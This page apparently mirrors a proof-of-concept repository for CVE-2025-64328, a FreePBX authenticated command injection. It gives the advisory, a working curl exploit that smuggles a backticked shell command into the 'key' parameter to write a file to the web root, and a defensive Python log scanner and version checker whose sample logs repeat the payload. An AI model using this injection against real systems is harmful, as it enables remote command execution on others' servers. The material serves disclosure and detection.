
CVE-2025-64328 PoC — FreePBX Administration GUI is Vulnerable to Authenticated Command Injection

Source
Associated Vulnerability
Title: FreePBX Administration GUI is Vulnerable to Authenticated Command Injection (CVE-2025-64328)
Description: FreePBX Endpoint Manager is a module for managing telephony endpoints in FreePBX systems. In versions 17.0.2.36 and above before 17.0.3, the filestore module within the Administrative interface is vulnerable to a post-authentication command injection by an authenticated known user via the testconnection -> check_ssh_connect() function. An attacker can leverage this vulnerability to obtain remote access to the system as the asterisk user. This issue is fixed in version 17.0.3.
Description
CVE-2025-64328 FreePBX Authenticated Command Injection in the framework module.
Readme
# CVE-2025-64328 FreePBX Authenticated Command Injection in `framework` module

Simple proof of concept repository for CVE-2025-64328 FreePBX Authenticated Command Injection in the `framework` module.

Full writeup here: https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/

## `curl` proof of concept
```
$ curl -s \
-XPOST --cookie-jar /tmp/freepbx-cookie --data 'username=lowprivuser&password=<lowprivuserpassword>' http://192.168.122.206/admin/config.php -o /dev/null \
--next \
--cookie /tmp/freepbx-cookie -H 'Referer: http://192.168.122.206' 'http://192.168.122.206/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user=asdf&port=22&key=asdf`echo%20rcetest2>/var/www/html/rcetest.txt`&path=test' | jq
{
  "status": true,
  "message": "Login failed"
}

$ curl -sk http://192.168.122.206/rcetest.txt
rcetest2
```
## Nuclei template

[CVE-2025-64328.yaml](./CVE-2025-64328.yaml)
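The curl proof of concept above shows the shape of the malicious request: a GET to `/admin/ajax.php` with `module=filestore&command=testconnection` and a backtick-wrapped shell command smuggled into the `key` parameter. The SSH test itself reports `"Login failed"`, but the injected command has already run by then, which is what the follow-up fetch of `rcetest.txt` confirms. Two checks a practitioner wants from that are a version test against the range stated in the advisory and a sweep of the web server access log for that request shape. The script below is an added example written for this page, not code from the PoC repository, from the writeup, or from FreePBX. It assumes an Apache/NGINX combined-format access log, uses constructed log lines (not real traffic), and applies only the version numbers quoted in the advisory text above.

```python
"""Triage helpers for CVE-2025-64328 (added example, not from the PoC repository).

  scan_access_log()     find filestore testconnection requests whose query
                        parameters carry shell metacharacters, i.e. what the
                        backtick payload in the PoC looks like in the access log
  is_affected_version() test a module version string against the range the
                        advisory states: 17.0.2.36 <= version < 17.0.3
"""
import re
from urllib.parse import parse_qs, urlsplit

# Request line of a combined-format entry: "GET /target HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Characters that terminate or nest a shell command. None of them belongs in an
# SSH host, user, port, key name or remote path.
SHELL_META_RE = re.compile(r"[`;|&]|\$\(|\$\{")

AFFECTED_MIN = (17, 0, 2, 36)  # first affected version per the advisory
FIXED = (17, 0, 3)             # fixed version per the advisory


def _version_tuple(version: str) -> tuple:
    return tuple(int(part) for part in version.strip().split("."))


def is_affected_version(version: str) -> bool:
    """True when the version string falls inside the advisory's affected range."""
    return AFFECTED_MIN <= _version_tuple(version) < FIXED


def is_filestore_testconnection(target: str) -> bool:
    """True for /admin/ajax.php?module=filestore&command=testconnection&... targets."""
    parts = urlsplit(target)
    if not parts.path.endswith("/admin/ajax.php"):
        return False
    query = parse_qs(parts.query)
    return query.get("module") == ["filestore"] and query.get("command") == ["testconnection"]


def injected_params(target: str) -> dict:
    """Return {parameter: decoded value} for every query value holding shell metacharacters.

    parse_qs percent-decodes, so a raw backtick and an encoded %60 are both caught.
    '&' is the query separator, so a payload built from '&&' is split into empty
    parameters before this check sees it; the raw query is inspected for that case.
    """
    parts = urlsplit(target)
    hits = {}
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if SHELL_META_RE.search(value):
                hits[name] = value
    if "&&" in parts.query:
        hits["<raw query>"] = parts.query
    return hits


def scan_access_log(lines):
    """One finding per line that hits the vulnerable endpoint with a suspicious parameter."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match or not is_filestore_testconnection(match.group("target")):
            continue
        hits = injected_params(match.group("target"))
        if hits:
            findings.append({"line": lineno, "method": match.group("method"), "params": hits})
    return findings


# Constructed sample log lines (not captured traffic). Line 2 carries the PoC payload,
# percent-encoded the way a web server records it.
SAMPLE_LOG = [
    '192.168.122.1 - - [01/Nov/2025:10:00:01 +0000] "GET /admin/ajax.php?module=filestore'
    '&command=testconnection&driver=SSH&host=10.0.0.5&user=backup&port=22&key=id_rsa'
    '&path=/backups HTTP/1.1" 200 41 "http://192.168.122.206/admin/config.php" "Mozilla/5.0"',
    '192.168.122.1 - - [01/Nov/2025:10:00:02 +0000] "GET /admin/ajax.php?module=filestore'
    '&command=testconnection&driver=SSH&host=127.0.0.1&user=asdf&port=22'
    '&key=asdf%60echo%20rcetest2%3E/var/www/html/rcetest.txt%60&path=test HTTP/1.1"'
    ' 200 41 "http://192.168.122.206" "curl/8.5.0"',
    '192.168.122.1 - - [01/Nov/2025:10:00:03 +0000] "GET /admin/ajax.php?module=core'
    '&command=getJSON&jdata=grid HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
    '192.168.122.1 - - [01/Nov/2025:10:00:04 +0000] "GET /rcetest.txt HTTP/1.1"'
    ' 200 9 "-" "curl/8.5.0"',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
    for v in ("17.0.2.35", "17.0.2.36", "17.0.2.40", "17.0.3"):
        print(v, "affected" if is_affected_version(v) else "not affected")
```

The PoC issues the request as a GET, so the payload lands in the request line of the access log; if the same handler were driven with a POST body the parameters would not be logged and the sweep above gives only a lower bound. Because the bug is post-authentication, every hit should be matched to the FreePBX account whose session made it, and a dropped file under the web root (as in the PoC) is a second artifact worth looking for on disk.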
File Snapshot

```
[4.0K]  /data/pocs/7ab9202fc269988b154a2d2ee67fe76c748c28ea
├── [2.2K]  CVE-2025-64328.yaml
└── [ 939]  README.md

1 directory, 2 files
```